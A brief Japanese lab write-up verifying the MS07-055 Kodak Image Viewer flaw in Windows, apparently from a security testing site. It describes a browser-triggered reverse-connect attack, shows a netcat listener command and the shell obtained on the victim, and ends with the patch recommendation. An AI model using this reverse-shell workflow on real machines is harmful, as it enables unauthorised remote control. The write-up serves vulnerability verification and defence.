MS07-055:Kodak Image Viewer の脆弱性により、リモートでコードが実行される

• 2007/11/12　初版
  • Author grin

• Kodak Image Viewer の脆弱性

• Windows 2000 Service Pack 4
• Windows XP Service Pack 2
• Windows Server 2003 Service Pack 1 および Windows Server 2003 Service Pack 2

• Microsoft::マイクロソフト セキュリティ アドバイザリ (MS07-055)
• CVE

• Windows 2000 Advanced Server SP4(フルパッチ)日本語版

• 攻撃先IPアドレス: 192.168.0.200
• 攻撃元IPアドレス: 192.168.0.100
• 攻撃先PCのIEで攻撃元PCの80番ポートへアクセスする受動的攻撃にてリバースコネクトを行う

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\tool>.\nc\nc.exe -lp 1337
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator\デスクトップ>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter ローカル エリア接続 3:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.112.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.112.2

Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.254

C:\Documents and Settings\Administrator\デスクトップ>hostname
hostname
victim

C:\Documents and Settings\Administrator\デスクトップ>

• 上記のように攻撃先PCのシェルを取得することに成功。

• MS07-055 パッチの適用 (Windows Update の実施)